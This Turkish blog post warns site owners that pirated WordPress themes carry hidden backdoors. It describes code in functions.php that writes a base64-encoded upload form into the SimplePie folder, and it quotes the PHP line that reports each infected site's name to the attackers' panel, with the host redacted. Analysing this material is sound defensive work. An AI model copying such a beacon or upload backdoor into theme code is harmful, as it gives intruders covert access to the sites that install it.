BİZİ ARAYIN: 0507 6964120 Canlı Destek Bildirim Yap
Temalardaki Tuzaklar

Temalardaki Tuzaklar

[et_pb_section fullwidth=”on” specialty=”off”][et_pb_fullwidth_menu admin_label=”Tam Sayfa Menü” menu_id=”120″ background_color=”#dd9933″ background_layout=”dark” text_orientation=”center” submenu_direction=”downwards” /][/et_pb_section][et_pb_section][et_pb_row][et_pb_column type=”4_4″][et_pb_text admin_label=”Text” background_layout=”light” text_orientation=”left”]

Temalardaki Tuzaklar

Merhaba arkadaşlar, birçok tema yapımcısının emeklerini hiç sayarak insanlara ücretsiz sunan ve wordpress tema aramalarında ilk sıralarda gelen bu sitelerin ne denli büyük bir tuzak olduğunu hep beraber göreceğiz. Lütfen sabırlıca dikkatinizi vererek okuyunuz.

 

tuzak 01

tuzak 01

Neden warez kullanmamalıyız sorusunun cevabının; temaya emek veren insanların bütün hakkının gaspedilmesinin yanı sıra temayı kullanan insanlar içinde nasıl bir tehdit olduğunu şimdi hep birlikte görelim.

Bu sitede görmüş olduğunuz her tema sahiplerinin izni olmaksızın dosyalarının çekilip yayınlanmasından ibaret, öyle ki çok ciddi sayıda temayı bu sitede görebiliyoruz.

Özellikle webmaster forumlarında her insanın bu siteye girmiş olma ihtimali çok yüksek. Sadece warez anlamında değil daha warezin ne olduğunu bilmeyen insanların dahi bu siteye girip temaları indirmiş olma ihtimali çok yüksek. Şimdi burda yayınlanmış olan bütün temaların içine gizlenmiş olan kodlar ile bütün bilgilerinize, hostunuza nasıl erişim sağladıklarını bir inceleyelim.

Herhangi bir temayı indirip functions.php dosyasını inceledik. Resimde kırmızı çerçeve içine aldığım kod ile uzaktaki bir txt dosyasının içindeki kodların sitenize uygulanması mümkün kılınmış. Şöyle ki bu linkteki adrese girdiğimiz zaman şöyle bir sonuç ile karşılaşıyoruz:

tuzak 02

tuzak 02

 

Php bilen arkadaşlar daha iyi bileceklerdir ki bu dosyanın içindeki kodlar ile “/wp-includes/SimplePie/” dizininin içine theme-options.php isimli bir dosya oluşturulmakta ve bu dosyanın içinide “val(base64_decode” şeklinde başlayan kodlar yerleştirilmektedir. Bu kodu decode edip incelediğimiz zaman bir tür upload formu ile karşılaşıyoruz, oda şu şekildedir:

tuzak 03

tuzak 03

 

Gördüğünüz upload formunu oluşturup bu form sayesinde sitenize istedikleri zararlı dosyayı yüklemeleri, sadece bu bahsi geçen siteden tema indirip onu aktif etmenize bakıyor.

Bu kadar basite indirgenmiş bir sistem oluşturulmuş. Peki bunlar benim siteme onlardan indirdiğim temayı kurduğumu nasıl bielceklerde bana zarar verebilecekler diye düşünebilirsiniz.

Oda şu şekilde mümkün kılınmış: @file_get_contents("http://***gizlenmiştir***/panel/l.php?a=http://".$_SERVER['SERVER_NAME']);

Satırı sayesinde sitenizde oluşturulmuş olan formun linki bu insanların panelinde görünebiliyor, ve bugun kim temamızı indirip tuzağa düşmüş diye kontrol edebiliyorlar.

Bu temalardan 2 3 tanesini inceleme fırsatı bulabildim, kimilerinde bu şekilde functions.php dosyasına kolay bir yol ile eklenmiş, bazılarına ise daha karmaşık ve kuşku uyandırmayacak yollar ile aynı sistem entegre edilmiştir.

Tek ortak nokta hepsinde “/wp-includes/SimplePie/theme-options.php” dizinine aynı isimle form oluşturulması şeklinde görürünüyor.

Şimdi bilenler olabilir, veya şuan öğreneceği üzere bu bir tür null vbulletin vakası gibi de düşünülebilir.

Vbulletin indir kelimesinde yarışan ilk 3 4 siteninde buna benzer yollar ile sisteminize shell atılması mümkün kılınmış ve bu yüzden bir çok siteye zarar verilmiştir.

Aynı mantığın wordpress içinde geçerli olduğunu görüyoruz. Bu kendini zeki sanan arkadaşlar “wordpress tema indir”, “wp tema indir”, “ücretsiz tema indir” tarzı kelimelerde en üste çıkmak için seo çalışmaları yapıyor ve onlara güvenip warez olsun veya olmasın herhangi bir temayı indirdiğiniz zaman bu tür tuzaklara düşebiliyorsunuz.

O yüzden burda zaten warez tema kullanmış beterine uğrasın” demek doğru bir tepki olsada aslında warez temaya dair bilgisi olmayan sadece tema indirmek için indiren insanlarda olabilir, bu insanların hostunu siz sağlıyor olabilirsiniz.

Veya bu insanların arkadaşı olabilirsiniz. Bilmeden kötü sonuçlar doğurabileceklerini göremeyebilirler.

Burda sadece onlar değil sizlerde zarar görebilirsiniz. İşte bu yüzden bu tür tuzaklara düşmemeniz konusunda ayrıntılı olara bu konuyu açtım.

Her konuda olduğu gibi artık wordpress temaları konusunda da titiz davranmalı, hem başkalarının emeklerine konmaktan geri durmalı hemde 3 kuruş vermemek adına kendinizi yakmayı göze almamalısınız.

Ve bu sadece bir örnek bu gibi gizli kodlar internette bedava tema adı altında çok mevcut..

Saygılarımızla Yazı YavuzTR’den Alıntıdır kendisine emeğinden ötürü Teknoasweb olarak teşekkür ederiz.

[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row][et_pb_column type=”1_2″][et_pb_text admin_label=”Metin” background_layout=”light” text_orientation=”left”]

Sorunuzmu Var?

Bu konu ile ilgili takıldığınız bir konu olursa sağ taraftaki iletişim formundan bize ulaşabilirsiniz.

logo_pp

Teknoasweb Bilişim Teknolojileri
Alper OKCU
Toros Mah. 816 sk. Duygunlar Apt. No 9/2 Konyaaltı / Antalya
Tel: +90 242 231 00 0

[/et_pb_text][/et_pb_column][et_pb_column type=”1_2″][et_pb_contact_form admin_label=”İletişim Formu” captcha=”on” email=”alper@teknoasweb.com” title=”İletişim” /][/et_pb_column][/et_pb_row][/et_pb_section]

Bir Yorum Bırakın